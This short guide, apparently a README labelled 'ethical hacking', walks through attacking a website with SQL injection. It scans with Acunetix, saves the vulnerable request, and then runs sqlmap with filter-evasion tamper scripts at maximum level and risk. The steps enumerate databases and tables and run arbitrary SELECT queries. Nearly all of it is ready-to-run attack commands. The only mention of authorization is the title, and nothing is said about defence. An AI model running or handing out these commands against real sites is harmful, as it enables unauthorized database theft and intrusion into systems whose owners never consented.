#just-4-ethical-hacking

Warning : for do it faster you can set this in commands   --threads=1   and watch carefully for what sqlmap asking you or responding you
_______________________________________________________________________________________________________________________________________________
Let's start

1 : scan your website with acunetix

2 : save the vulnerability request and delete the payload in request the save it as txt file

3 : use the below command

sqlmap -r Hi.txt -p nationalCode --tamper="between,randomcase,space2comment" --level 5 --risk 3 --technique=BEUST --dbs

4 : -r  after this put your txt file ( i told in 2 ) , -p means the vulnerability parameter

_______________________________________________________________________________________________________________________________________________

If you just want to find the vulnerability parameter use this command : sqlmap -r Hi.txt --tamper="between,randomcase,space2comment" --level 5 --risk 3 --technique=BEUST

Then for gathering database : sqlmap -r Hi.txt --tamper="between,randomcase,space2comment" --level 5 --risk 3 --technique=BEUST --dbs

Now lets find the vulnerability database use this command : sqlmap -r hi.txt -p HI --tamper="between,randomcase,space2comment" --level 5 --risk 3 --technique=BEUST  --sql-query "SELECT * FROM TABLE;"

Afte finding the best database use this : sqlmap -r Hi.txt -p HI --tamper="between,randomcase,space2comment" --level 5 --risk 3 --technique=BEUST -D HI --tables

Or sqlmap -r Hi.txt -p HI --tamper="between,randomcase,space2comment" --level 5 --risk 3 --technique=BEUST -D HI --tables --hex
